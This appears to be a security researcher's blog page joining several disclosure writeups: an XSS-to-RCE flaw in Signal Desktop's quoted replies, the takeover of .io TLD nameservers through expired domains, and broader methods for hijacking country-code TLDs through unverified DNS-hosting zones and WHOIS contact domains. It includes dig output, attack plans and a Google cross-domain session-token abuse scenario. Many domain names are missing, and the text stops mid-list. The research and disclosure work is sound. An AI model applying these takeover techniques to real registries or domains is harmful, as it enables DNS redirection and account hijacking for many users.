Remediation TL;DR

If you’re a concerned Signal user please update to the latest version of Signal Desktop (fixed in version v1.11.0) which addresses all of these issues. Note that the mobile apps for Signal were not affected by this issue.

Background Information

If you’re an avid follower of all that is security-Twitter, then you’ve probably heard about the impressive finding of Remote Code Execution (RCE) via HTML markup injection in Signal Desktop by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor):

Shortly after seeing this Tweet I wanted to validate if this finding was indeed real so I played around with my own copy of Signal Desktop to see if I could reproduce these results. I previously worked with @LittleJoeTables and @infosec_au on research investigating exploitation of web-on-desktop type apps and so I was fairly certain I knew what I was looking at. I began playing around with the Signal Desktop app trying to get arbitrary HTML markup to be evaluated but it didn’t appear to be straightforward. After trying a few different fields (name, plain message, etc) I eventually found that if you created a message with HTML markup (say, <h1>Test</h1>), and you then did a Quoted Reply message to that message, the original markup would be evaluated as HTML! I then posted on Twitter than I was able to reproduce the problem:

“Wait a Minute…”

However, something was not quite right. I later applied the Signal update and yet I was still able to exploit my issue so I thought there was something wrong with my install. I uninstalled Signal Desktop and didn’t think much of it until I later read the writeup done by the security researchers. Upon reading the writeup I realized the researchers were just sending vanilla Signal messages which were being interpreted as HTML, and not the Quoted Replies that I had been using. I messaged @HacKanCuBa on Twitter to discuss this oddity, and he tried my method on his copy of Signal Desktop to find…the exploit still worked! As it turns out both were separate very similar vulnerabilities resulting in the same impact. Who could have guessed that?

After this realization we quickly notified Signal of the issue. They had a patch out in hours which was very impressive and they even added in some extra mitigations to prevent the problem from occurring again.

Vulnerability Root Cause

For the full writeup on the original vulnerability, see this article. Here we’ll dive into the root cause of my particular variant (CVE-2018-11101) and show how Signal fixed it.

The core of the vulnerability was in the use of React’s dangerouslySetInnerHTML in order to render the contents of a Quoted Reply message. The relevant code can be found in Quote.tsx and is the following:

  public renderText() {
    const { i18n, text, attachments } = this.props;

    if (text) {
      return (
        <div className="text" dangerouslySetInnerHTML=\{\{ __html: text \}\} />
...trimmed for brevity...

To quote the React documentation itself:

_dangerouslySetInnerHTML is React’s replacement for using innerHTML in the browser DOM. In general, setting HTML from code is risky because it’s easy to inadvertently expose your users to a cross-site scripting (XSS) attack. So, you can set HTML directly from React, but you have to type out dangerouslySetInnerHTML and pass an object with a _html key, to remind yourself that it’s dangerous.</a>

Much like innerHTML, use of dangerouslySetInnerHTML is, well, dangerous and can cause lead to XSS like what occurred in the Signal Desktop app. This allowed for the quoted reply text to be evaluated as HTML and served for the base of this exploit.

Signal fixed this by removing the usage of dangerouslySetInnerHTML, along with further tightening the app’s CSP.

All said and done this vulnerability was present in the Signal Desktop app for about three weeks total before being patched (starting in 1.8.0).

Going Forward

Thanks to some help from my friends @aegarbutt and @LittleJoeTables we were able to compile a list of strategic defense-in-depth recommendations for Signal Desktop which we’ve sent to the Signal security team per their request. At the end of the day there will always be new “hot” vulnerabilities, but the “vendor” response is generally what separates the wheat from the chaff. The Signal team’s quick patch time along with a strong interest in mitigating vulnerabilities of this type in the future was encouraging to see. I’ll remain a Signal user for the foreseeable future :)

Exploit Video


  • 4:31 PM – May 11, 2018 PST – Discovery of exploit, although originally mistaken by me for a duplicate.
  • ~3:30 PM – May 14, 2018 PST – Revelation that exploit works against latest version of Signal
  • 3:57 PM – May 14, 2018 PST – Vulnerability disclosed to Signal Security
  • 4:21 PM – May 14 2018 PST – Signal requests 24 hours before disclosure to ensure users patch. States a patch will be out in 2-3 hours.
  • ~5:47 PM – May 14 2018 PST – Patch pushed to all Signal Desktop users


Special thanks to the following folks:


In a previous post we talked about taking over the .na,, and domain extensions with varying levels of DNS trickery. In that writeup we examined the threat model of compromising a top level domain (TLD) and what some avenues would look like for an attacker to accomplish this goal. One of the fairly simple methods that was brought up was to register a domain name of one of the TLD’s authoritative nameservers. Since a TLD can have authoritative nameservers at arbitrary domain names it’s possible that through a misconfiguration, expiration, or some other issue that someone would be able to register a nameserver domain name and use it to serve new DNS records for the entire TLD zone. The relevant quote from the previous post I’ll include here:

This avenue was something I was fairly sure was going to be the route to victory so I spent quite a lot of time building out tooling to check for vulnerabilities of this type. The process for this is essentially to enumerate all nameserver hostnames for a given extension and then checking to see if any of the base-domains were expired and available for registration. The main issue I ran into is many registries will tell you that a domain is totally available until you actually attempt to purchase it. Additionally there were a few instances where a nameserver domain was expired but for some reason the domain was still unavailable for registration despite not being marked as reserved. This scanning lead to the enumeration of many domain takeovers under restricted TLD/domain extension space (.gov, .edu, .int, etc) but none in the actual TLD/domain extensions themselves.

As it turns out, this method was not only a plausible way to attack a TLD, it actually led to the compromise of the biggest TLD yet.

The .io Anomaly

While graphing out the DNS delegation paths of various TLDs late on a Friday night I noticed a script I had written was giving me some unexpected results for the .io TLD:

io._trust_tree_graphOne of the features of this script (called TrustTrees) is that you can pass it a Gandi API key and it will check to see if any of the nameservers in the delegation chain have a domain name that’s available for registration. It appeared that Gandi’s API was returning that multiple .io nameserver domains were available for purchase! This does not necessarily mean you can actually register these domain names however, since in the past I had seen multiple incidents where registries would state a domain name was available but wouldn’t allow the actual registration to go through due to the domain name being “reserved”. I decided to go straight to the source and check the registry’s website at NIC.IO to see if this was true. After a quick search for the nameserver domain of I was surprised to find that the registry’s website confirmed that this domain was available for the registration price of 90.00 USD. Given that this was around midnight I decided to go ahead and attempt to purchase the domain to see if it would actually go through. Shortly afterwards I received an email confirming that my domain name registration was “being processed”:

ns-a1.io_domain_purchase_confirmation_receiptIt’s not clear why I received a confirmation from 101Domain but apparently .io’s registrations (and possibly their entire registry?) is managed via this company. Since it was well past midnight at this point I shrugged it off and eventually forgot about the registration until the following Wednesday morning when I got the following notification as I was walking out the door to go to work:

ns-a1.io_domain_activated_emailAt this point I instantly was reminded of the details of that registration and I turned around to check if I had actually just gained control over one of .io’s nameservers. I dig a quick dig command for the domain and sure enough my test DNS nameservers (ns1/ were listed for

bash-3.2$ dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8052
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;          IN  NS

;; ANSWER SECTION:       86399   IN  NS       86399   IN  NS

;; Query time: 4 msec
;; SERVER: 2604:5500:16:32f9:6238:e0ff:feb2:e7f8#53(2604:5500:16:32f9:6238:e0ff:feb2:e7f8)
;; WHEN: Wed Jul  5 08:46:44 2017
;; MSG SIZE  rcvd: 84


I queried one of the root DNS servers to again confirm that this domain was listed as one of the authoritative nameservers for the .io TLD and sure enough, it definitely was:

bash-3.2$ dig NS io.

; <<>> DiG 9.8.3-P1 <<>> NS io.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19611
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 7, ADDITIONAL: 12
;; WARNING: recursion requested but not available

;io.                IN  NS

io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS
io.         172800  IN  NS

;; ADDITIONAL SECTION:       172800  IN  AAAA    2001:678:4::1       172800  IN  AAAA    2001:678:5::1      172800  IN  AAAA    2a01:8840:9e::17      172800  IN  AAAA    2a01:8840:9f::17      172800  IN  AAAA    2a01:8840:a0::17       172800  IN  A       172800  IN  A       172800  IN  A       172800  IN  A      172800  IN  A      172800  IN  A      172800  IN  A

;; Query time: 70 msec
;; SERVER: 2001:7fd::1#53(2001:7fd::1)
;; WHEN: Wed Jul  5 08:46:14 2017
;; MSG SIZE  rcvd: 407

Yikes! I quickly SSHed into my DNS testing server that was now hosting this domain and quickly killed the BIND server that was running. If I was starting to receive DNS traffic I certainly didn’t want to serve up bad responses for people trying to legitimately access their .io domain names. With the BIND server no longer responding to queries on port 53 all DNS queries would automatically fail over to the other nameservers for the TLD and it wouldn’t greatly affect the traffic (other than a slight delay in resolution time while DNS clients failed over to working nameservers). In order to see if I was actually receiving traffic I did a quick tcpdump of all DNS traffic to a file to see just how many queries I was currently getting. I immediately saw hundreds of queries verbosely being printed to my terminal from random IP addresses across the Internet. It looks like I was definitely serving up traffic for the entire .io TLD, and worse yet this was likely only the beginning since many DNS clients likely were still operating on cached DNS records which would clear shortly.

Reporting a Security Issue in a TLD

With my server no longer responding to any DNS queries my mind was then set on getting this fixed as quickly as possible. My main concern was that there were still multiple other nameserver domains which could still be registered and that could be done by anyone with the money and the knowledge to do so. I looked up the contacts for the .io TLD in IANA’s root database:


I then wrote up a summary of the issue and emailed both contacts about the problem and conveyed the urgency of the fix. I stated my concern with the other TLD nameserver domains being available for registration and stated that if I didn’t receive a response within a few hours that I would go ahead and register those as well to protect the TLD. After sending the email I immediately received a bounce message indicating that the [email protected] was not an email address that existed at all:

email_bounceThis was not a strong vote of confidence that someone was going to see this notice. I decided to take action and just spend the money to buy the other nameserver domains to prevent anyone else from hijacking the TLD. Just like with the first domain I explicitly set my DNS server to not respond to inbound queries so that it wouldn’t interfere with regular .io traffic. Those domain orders were actually filled quite quickly:

securing_other_nameserversPhew. At the very least this could no longer be exploited by any random attacker and I was able to head to work with much less worry.

Later that day I called NIC.IO’s support phone number and requested the appropriate email to contact any security personnel/team that they had for the TLD. The agent assured me that [email protected] was the appropriate contact for this issue (which I double verified just to be sure). While it seemed unlikely to be the correct contact I forwarded the report to that email address as well hoping that at the very least it would be forwarded by the abuse department to the appropriate place. With little further leads on reaching an appropriate security contact I waited for a response.

“Oops” – Remediation via Revoked Domains

Around noon the following day I received a blast of notifications from 101Domains stating that my domain privacy was deactivated, my “support ticket” was answered, and all of my domains had been revoked by the registry:

101domain_email_blastLooks like, shockingly enough, the [email protected] alias was the correct email address for the issue. After logging into my 101Domain account I found the following message from the 101Domain legal department:

101domain_oops_deleted_io_nsAll said and done this was actually an excellent response time (though usually I just get a “fixed it” response via email instead of a Legal Department notice). After verifying that I was not able to re-register these domains it would appear that this had been completely remediated.


Given the fact that we were able to take over four of the seven authoritative nameservers for the .io TLD we would be able to poison/redirect the DNS for all .io domain names registered. Not only that, but since we have control over a majority of the nameservers it’s actually more likely that clients will randomly select our hijacked nameservers over any of the legitimate nameservers even before employing tricks like long TTL responses, etc to further tilt the odds in our favor. Even assuming an immediate response to a large scale redirection of all .io domain names it would be some time before the cached records would fall out of the world’s DNS resolvers.

One mitigating factor that should be mentioned is that the .io TLD has DNSSEC enabled. This means that if your resolver supports it you should be defended from an attacker sending bad/forged DNS data in the way mentioned above. That being said, as mentioned in a previous post DNSSEC support is pretty abysmal and I rarely encounter any support for it unless I specifically set a resolver up that supports it myself.

*As an unrelated aside, it’s important to remember to kill tcpdump after you’ve started it. Not doing that is a great way to obliterate your VPS disk space with DNS data, which was an unexpected additional impact of this :). Please note that any DNS data recorded for debugging purposes has now been purged for the privacy of the users of the .io TLD/its domains.

Mitigations and TLD Security

I’ve already written at some length about how some of these issues could be mitigated from a TLD perspective (see Conclusions & Final Thoughts of the post The Journey to Hijacking a Country’s TLD – The Hidden Risks of Domain Extensions for more info on this). In the future I hope to publish a more extensive guide on how TLDs and domain extension operators can better monitor and prevent issues like this from occurring.


I promised a friend of mine that I would do a silly old-school hacker shout-out in my next blog post so I’m fulfilling this obligation here :)special thanks to the following folks for both moral and “immoral” support (as phrased by the one and only HackerBadger).

Greetz to [HackerBadger](, EngSec (y’all know who you are), and the creator of the marquee tag. [Hack the planet](, [the gibson](, etc.

I will liken him to a wise man, who built his house on a rock. The rain came down, the floods came, and the winds blew, and beat on that house; and it didn’t fall, for it was founded on the rock. Everyone who hears these words of mine, and doesn’t do them will be like a foolish man, who built his house on the sand. The rain came down, the floods came, and the winds blew, and beat on that house; and it fell—and great was its fall.

The Parable of the Wise and Foolish Builders

Domain names are the foundation of the Internet that we all enjoy. However, despite the amount of people that use them very few understand how they work behind the scenes. Due to many layers of abstraction and various web services many people are able to own a domain and set up an entire website without knowing anything about DNS, registrars, or even WHOIS. While this abstraction has a lot of very positive benefits it also masks a lot of important information from the end customer. For example, many registrars are more than happy to advertise a .io domain name to you but how many .io owners actually know who owns and regulates .io domains? I don’t think it’s a large stretch to say that most domain owners know little to nothing about the entities behind their domain name. The question that is asked even less is “What is this domain extension’s track record for security?”.

A Quick Introduction to the DNS Structure

Feel free to skip this section if you already know how DNS works and is delegated.

So what are you buying when you purchase a domain name? At a core, you’re simply buying a few NS (nameserver) records which will be hosted on the extension’s nameservers (this of course excludes secondary services such as WHOIS, registry/registrar operational costs, and other fees which go to ICANN). To better understand extension’s place in the chain of DNS we’ll take a look at a graph of‘s delegation chain. I’ve personally found that visualization is very beneficial when it comes to understanding how DNS operates so I’ve written a tool called TrustTrees which builds a graph of the delegation paths for a domain name:

example.com_trust_tree_graphThe above graph shows the delegation chain starting at the root level DNS server. For those unfamiliar with the DNS delegation process, it works via a continual chain of referrals until the target nameserver has been found. A client looking for the answer to a DNS query will start at the root level, querying one of the root nameservers for the answer to a given DNS query. The roots of course likely don’t know the answer and will delegate the query to a TLD, which will in turn delegate it to the appropriate nameservers and so on until an authoritative answer has been received confirming that the nameserver’s response is from the right place. The above graph shows all of the possible delegation paths which could take place (blue indicates an authoritative answer). There are many paths because DNS responses contain lists of answers in an intentionally random order (a technique known as Round Robin DNS) in order to provide load balancing for queries. Depending on the order of the results returned different nameservers may be queried for an answer and thus they may provide different results altogether. The graph shows all these permutations and shows the relationships between all of these nameservers.

So, as discussed above, if you bought the .com registry would add a few NS records to its DNS zones which would delegate any DNS queries for to the nameservers you provided. This delegation to your nameservers is what really gives you control over the domain name and the ability to make arbitrary sub-domains and DNS records for If the .com owning organization decided to remove the nameserver (NS) records delegating to your nameservers then nobody would ever reach your nameservers and thus would cease to work at all.

Taking this up a step in the chain you can think of TLDs and domain extensions in much the same way as any other domain name. TLDs only exist and can operate because the root nameservers delegate queries for them to the TLD’s nameservers. If the root nameservers suddenly decided to remove the .com NS records from its zone database then all .com domain names would be in a world of trouble and would essentially cease to exist.

Just Like Domain Names, Domain Name Extensions Can Suffer From Nameserver Vulnerabilities

Now that we understand that TLDs and domain extensions have nameservers just like regular domain names, one question that comes up is “Does that mean that TLDs and domain extensions can suffer from DNS security issues like domain names do?“. The answer, of course, is yes. If you’ve seen some of the past posts in this blog you’ve seen that we’ve learned that we can hijack nameservers in a variety of ways. We’ve shown how an expired or typo-ed nameserver domain name can lead to hijacking and we’ve also seen how many hosted DNS providers allow for gaining control over a domain’s zone without any verification of ownership. Taking the lessons we’ve learned from these explorations we can apply the same knowledge to attempt a much more grandiose feat: taking over an entire domain extension.

The Mission to Take Over a Domain Extension – The Plan of Attack

Unlike a malicious actor I’m unwilling to take many of the actions which would likely allow you to quickly achieve the goal of hijacking a domain extension. Along the course of researching methods for attacking domain extensions I found that many extension/TLD nameservers and registries are in an abysmal state to begin with, so exploiting and gaining control over one is actually much easier than many would think. Despite me considering tactics like obtaining remote code execution on a registry/nameserver to be out of scope I will still mention them as a viable route to success, since real world actors will likely have little regard for ethics.

Generally speaking, the following are some ways that I came up with for compromising a TLD/domain extension:

  • Exploit a vulnerability in the DNS server which hosts a given domain extension or exploit any other services hosted on an extension’s nameservers. Attacking registries also falls into this same category as they have the ability to update these zones as part of normal operation.
  • Find and register an expired or typo-ed nameserver domain which is authoritative for a domain extension/TLD.
  • Hijacking the domain extension by recreating a DNS zone in a hosted provider which no longer has the zone for the extension hosted there.
  • Hijacking the email addresses associated with a TLD’s WHOIS contact information (as listed in the IANA root zone database).

We’ll go over each of these and talk about some of the results found while investigating these avenues as possible routes to our goal.

Vulnerable TLD & Domain Extension Nameservers Are Actually Quite Common

To begin researching the first method of attack, I decided to do a simple port scan of all of the TLD nameservers. In a perfect world what you would like to see is a list of servers listening on UDP/TCP port 53 with all other ports closed. Given the powerful position of these nameservers it is important to have as little surface area as possible. Any additional services exposed such as HTTP, SSH, or SMTP are all additional pathways for an attacker to exploit in order to compromise the given TLD/domain extension.

This section is a bit awkward because I want to outline how dire the situation is without encouraging any malicious activity. During the course of this investigation there were a few situations where simply browsing things like websites hosted on the TLD nameservers led to strong indicators of both exploitability and in some cases even previous compromise. I will be omitting these and focusing only on some key examples to demonstrate the point.


The finger protocol was written in 1971 by Les Earnest to allow users to check the status of a user on a remote computer. This is an incredibly old protocol which is no longer used on any modern systems. The idea of the protocol is essentially to answer the question of “Hey, is Dave at his machine right now? Is he busy?”. With finger you can check into the remote user’s login name, real name, terminal name, idle time, login time, office location and office phone number. As an example, we’ll finger one of the authoritative nameservers for the country of Bosnia and see what the root user is up to:

bash-3.2$ finger -l [email protected]
Login: root                       Name: Charlie Root
Directory: /root                        Shell: /bin/sh
Last login Sat Dec 14 16:41 2013 (ICT) on console
No Mail.
No Plan.

Looks like root has been away for a long time! Let’s take a look at one of the nameservers for Vietnam:

bash-3.2$ finger -l [email protected]
Login name: nobody                In real life: NFS Anonymous Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: noaccess              In real life: No Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: nobody4               In real life: SunOS 4.x NFS Anonymous Access User
Directory: /                        
Never logged in.
No unread mail
No Plan.

Login name: named                 In real life: User run named
Directory: /home/named                  Shell: /bin/false
Never logged in.
No unread mail
No Plan.
bash-3.2$ finger -l [email protected]
Login name: root                  In real life: Super-User
Directory: /                            Shell: /sbin/sh
Last login Tue Sep 30, 2014 on pts/1 from DNS-E
No unread mail
No Plan.

This one is more recent with a last login date for root of September 30, 2014. The fact that this protocol is installed on these nameservers likely indicates just how old these servers are.

**Dynamic Websites


Probably the most common open nameserver port next to 53 was port 80 (HTTP). Some of the most interesting results came from simply visiting these websites. For example, one nameserver simply redirected me to an ad network:

* Rebuilt URL to:
*   Trying
* Connected to ( port 80 (#0)
> GET / HTTP/1.1
> Host:
> Accept: */*
> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
< HTTP/1.1 302 Moved Temporarily
< Server: nginx/1.10.1
< Date: Sun, 04 Jun 2017 03:16:30 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: close
< X-Powered-By: PHP/5.3.3
< Location:
* Closing connection 0

I’m still unsure if this was a compromised nameserver or if the owner was just trying to make some extra money off of sketchy ads.

Other nameservers (such as one of the Albania nameservers for,,,, and returned various configuration pages which print verbose information about the machine they run on:

phpinfo_al.com_al.govThe party wouldn’t be complete without the ability to run command-line utilities on the remote server (nameserver for .ke, .ba, and a handful of other extensions):

run_those_commands_bro**And much much more…


Additionally there are many other fun services which I won’t go too into much detail for brevity. Things like SMTP, IMAP, MySQL, SNMP, RDP are all not at all uncommon ports to be open on various domain extension nameservers. Given the large attack surface of these services I would rate the chances of this route succeeding very highly, however we won’t engage in any further testing given that we don’t want to act maliciously. Sadly due to the sheer number of nameservers running outdated and insecure software responsible disclosure to all owners would likely be an endless endeavor.

Checking for Expired TLD & Extension Nameserver Domain Names

This avenue was something I was fairly sure was going to be the route to victory so I spent quite a lot of time building out tooling to check for vulnerabilities of this type. The process for this is essentially to enumerate all nameserver hostnames for a given extension and then checking to see if any of the base-domains were expired and available for registration. The main issue I ran into is many registries will tell you that a domain is totally available until you actually attempt to purchase it. Additionally there were a few instances where a nameserver domain was expired but for some reason the domain was still unavailable for registration despite not being marked as reserved. This scanning lead to the enumeration of many domain takeovers under restricted TLD/domain extension space (.gov, .edu, .int, etc) but none in the actual TLD/domain extensions themselves.

Examining Hosted TLD & Extension Nameserver for DNS Errors

One useful tool for finding vulnerabilities (even ones you didn’t even know existed) is to scan for general DNS errors and misconfigurations and investigate the anomalies you find. One useful tool for this is ZoneMaster which is a general DNS configuration scanning tool which has tons and tons of tests for misconfigurations of nameservers/DNS. I tackled this approach by simply scripting up ZoneMaster scans for all of the domain extensions listed in the public suffix list. Pouring over and grepping through the results led to some pretty interesting findings. One finding is listed in a previous blog post (in the country of Guatemala’s TLD .gt) and another is shown below.

Striking Paydirt – Finding Vulnerabilities Amongst the Errors

After scripting the ZoneMaster tool to automate scanning all of the TLD/domain extensions in the public suffix list I found one particularly interesting result. When scanning over the results I found that one of the nameservers for the extension was serving a DNS REFUSED error code when requesting the nameservers for the zone:

dns_refused_co_aoA quick verification with dig confirmed that this was indeed the case:

$ dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 21693
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;                IN    NS

;; Query time: 89 msec
;; WHEN: Thu Feb  9 21:57:35 2017
;; MSG SIZE  rcvd: 23

The nameserver in question,, appeared to be run by a third party DNS hosting service called Backup DNS:

backupdns_homepageAfter some examination of this site it appeared to be a fairly aged DNS hosting service with an emphasis on hosting backup DNS servers in case of a failure on the primary nameserver. What piqued my interest to investigate was the DNS error code REFUSED which is often used as a response error when the nameserver simply does not have a zone stored for the specified domain (in this case the domain). This is often dangerous because hosted DNS providers will often allow for DNS zones to be set up by any account with no verification of domain name ownership, meaning that anyone could create an account and a zone for to potentially serve entirely new records.

Interested in seeing if this was possible I created an account on the website and turned their documentation page:

backupdns_documentationGiven the name of the site the set up instructions made sense. In order to create a zone for the zone I had to first add the zone to my account via the domain management panel:

adding_co_ao_to_accountThis worked without any verification but there was still no zone data loaded for that particular zone. The next steps were to set up a BIND server on a remote host and configure it to be an authoritative nameserver for the zone. Additionally, the server had to be configured to allow zone transfers from the BackupDNS nameserver so that the zone data could be copied over. The following diagrams show this process in action:

axfr_backupdns_1We start with our Master DNS Server (in this case a BIND server set up in AWS) and the target BackupDNS nameserver we want our zone to be copied into.

axfr_backupdns_2On a regular interval the BackupDNS nameserver will issue a zone transfer request (the AXFR DNS query). This is basically the nameserver asking “Can I have a copy of all the DNS data you have for“.

axfr_backupdns_3Since we’ve configured our master nameserver to allow zone transfers from the BackupDNS nameserver via the allow-transfer configuration in BIND the request is granted and the zone data is copied over. We have now created the proper zone in the BackupDNS service!

Ok, so I’d like to pause for just a moment and point out that at this point, I really wasn’t thinking that this would work. This wasn’t the first time I’d tested for issues like this with various nameservers and previous attempts had ended unsuccessfully. That being said, just in case it did work the zone I had copied over was intentionally made with records that had a TTL of 1 second and a SOA record of only 60 seconds. This means that the records would be thrown quickly out of the cache and the DNS request would me remade shortly to another nameserver which was a legitimate one for the extension. If you ever undertake any testing of this nature I highly recommend you do the same in order to minimize caching bad DNS responses for people trying to access the target legitimately.

It, of course, did work and the BackupDNS nameserver immediately began serving DNS traffic for After I saw the service confirm the copy I did a quick query with dig to confirm:

$ dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 37564
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;        IN    NS

;; AUTHORITY SECTION:        60    IN    SOA 147297980 900 900 1800 60

;; Query time: 81 msec
;; WHEN: Sun Feb 12 23:13:50 2017
;; MSG SIZE  rcvd: 83

Uh oh, that’s not good. I had originally placed a few NS records in the BIND zone file with the intention of delegating the DNS queries back to the legitimate nameservers but I screwed up the BIND config and instead of replying with a DNS referral the server replied with an authoritative answer of NXDOMAIN. This is obviously not great so I quickly deleted the zone from the BackupDNS service. Due to some annoying caching behavior of the BackupDNS service this took a few minutes longer than I would’ve liked but soon enough the service was again returning REFUSED for all queries for Luckily this took all took place at ~3:00 AM Angola time, this combined with the long TTL for the TLD likely meant that very few users were actually impacted by the event (if any).


Despite the road bump this confirmed that the extension was indeed vulnerable. I then turned back to the scan results I had collected and found that not only was vulnerable but,, and were vulnerable as well! is another domain extension for the country of Angola which is commonly used for out-of-country entities. is the organization that runs the and extensions.

Given the large impact that could occur if these extensions were hijacked maliciously I decided to block other users from being able to add these zones to their own BackupDNS accounts. I added all the extensions to my own account but did not create any zone data for them, this ensured they were still returned the regular DNS errors with no results while still preventing further exploitation:

ao_hijack_proofAfter preventing immediate exploitation I then attempted to reach out to the owners of the and extensions. For more information on the disclosure process please see “Responsible Disclosure Timeline” below.

Hijacking a TLD – Compromising the .na TLD via WHOIS

While hijacking a nameserver for a domain extension is pretty useful for exploitation, there is a higher level of compromise that TLDs specifically can suffer from. Ownership of a TLD is outlined by the contacts listed on the WHOIS record which is hosted at the IANA Root Zone Database. As an attacker our main interest would be in getting the nameservers switched over to our own malicious nameservers so that we can serve up alternative DNS records for the TLD. IANA has a procedure for initiating this change for ccTLDs which can be found here. The important excerpt from this is the following:

The IANA staff will verify authorization/authenticity of the request and obtain confirmation from the listed TLD administrative and technical contacts that those contacts are aware of and in agreement with the requested changes. A minimum authentication of an exchange of e-mails with the e-mail addresses registered with the IANA is required.

The key note to make is that IANA will allow a nameserver change to be made for a TLD (just complete this form) if both the admin and technical contact on the WHOIS confirm via email that they want the change to occur.

In the interest of testing the security of this practice I enumerated all of the TLD WHOIS contact email address domains and used the TrustTrees script I wrote to look for any errors in the DNS configurations of these domains. After reading through pages of diagrams I found something interesting in the DNS for the .na TLD’s contact email domain ( The following is a diagram of the delegation paths for that domain: relevant section of this graph being the following:

zoomed-na-nic_com_naAs can be seen above, three nameservers for the domain all return fatal errors when queried. These nameservers,, and all belong to the managed DNS provider RapidSwitch. If we do a query in dig we can see the specific details of the error being returned:

$ dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 56285
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;            IN    NS

;; Query time: 138 msec
;; SERVER: 2001:1b40:f000:41::4#53(2001:1b40:f000:41::4)
;; WHEN: Fri Jun  2 01:13:03 2017
;; MSG SIZE  rcvd: 31

The nameserver replies with a DNS REFUSED error code. Just as with the Angola domain extensions this error code can indicate that the domain is vulnerable to takeover if the managed DNS provider does not properly validate domains before users add them to their account. To investigate I created a RapidSwitch account and navigated to the “My Domains” portion of the website:

add_hosted_domain_buttonThe “My Domains” section contained an “Add Hosted Domain” button which was exactly what I was looking to do.

domain_added_banner_rapidswitchBy completing this process I was able to add the domain to my account without any ownership verification. It appeared that the only verification that occurs is a check to ensure that RapidSwitch is indeed listed as a nameserver for the specified domain.

Having the domain in my account was problematic because I then had to replicate the DNS setup of the original nameserver in order to prevent interruptions to the domain’s DNS (which hosts email, websites, etc for Deleting the domain from my account would’ve made the domain vulnerable to takeover again so I had to clone the existing records as well.

Once the records were created I added some records for in order to verify that I had indeed successfully hijacked the DNS for the domain. The following dig query shows the results:

$ dig ANY

; <<>> DiG 9.8.3-P1 <<>> ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49573
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 4, ADDITIONAL: 4
;; WARNING: recursion requested but not available

;        IN    ANY

;; ANSWER SECTION:    300    IN    A    300    IN    TXT    "mandatory was here"

;; AUTHORITY SECTION:        300    IN    NS        300    IN    NS        300    IN    NS        300    IN    NS

;; ADDITIONAL SECTION:    1200    IN    A    1200    IN    A    3600    IN    A    1200    IN    A

;; Query time: 722 msec
;; SERVER: 2001:1b40:f000:42::4#53(2001:1b40:f000:42::4)
;; WHEN: Sat Jun  3 17:33:59 2017
;; MSG SIZE  rcvd: 252

As can be seen above, the TXT record (and A record) is successfully returned indicating that the DNS hijacking issue is confirmed. In a real world attack the final step would be to DDoS the remaining legitimate nameserver to eliminate competition for DNS responses (a step we obviously won’t be taking)*.

After this I reached out to the .na TLD contacts to report the vulnerability and get it fixed as soon as possible. For more information on this disclosure timeline see the “Responsible Disclosure Timeline” section below.

*There is one more issue with our attack plan, unlike * and * the domain has DNSSEC enabled. This is actually something that I didn’t even notice at first because my resolver doesn’t support DNSSEC. After trying it on a few different networks it appears that almost every resolver I used does not actually enforce DNSSEC properly (which surprised me quite a bit). After doing some more research it appears that global adoption is quite low for DNS resolvers which explains this behavior. So, depending on resolver configurations our attack may be complicated by this issue! We’ll discuss this further in the final conclusions section below. That being said, nice job to the admin setting it up!

The Impact of a TLD/Domain Extension Takeover

Universal Authentication & International Domains

Despite these vulnerabilities affecting an extension for the country of Angola and Namibia the effects are much farther reaching than just these countries. For example, many popular online services will have multiple homepages with domain extensions of the local country/area to give the site a more local feeling. Many of these sites will tie all of these homepages together with a universal authentication flow that automatically logs the user into any of the homepage despite them all being separate domains.

One example of this is Google which has search homepages with many extensions (here is a link which appears to have aggregated them all). One of these, of course, is

google_co_aoAnother being

google-naIn order to provide a more seamless experience you can easily log yourself into any Google homepage (if you were already authenticated to Google on another homepage) by just clicking the blue button on the top right corner of the homepage. This button is just a link similar to the following:

Visiting this link will result in a 302 redirect to the following URL:[SESSION_TOKEN]&continue=

This passes a session token in the sidt parameter which logs you into the domain and allows the authentication to cross the domain/origin barrier.

What this means for exploitation however, is that if you compromise any Google homepage domain extension (of which Google trusts approximate ~200) then you can utilize the vulnerability to begin hijacking any Google account from any region. This is a bizarre threat model because it’s quite likely that you’d be able to exploit one of the 200 domain extension nameservers/registries before you could get a working Google account exploit in their standard set of services. After all, Google has a large security team full of people constantly auditing their infrastructure where as many TLDs and domain extensions are just run by random and often small organizations.

This is simplifying it quite a bit of course. In order to actually abuse a DNS hijacking vulnerability of this type you would have to complete the following steps (all in a stealthy manner as to not get caught too quickly):

  • Compromise a domain extension’s nameserver or registry to gain the ability to modify nameservers for your target’s website.
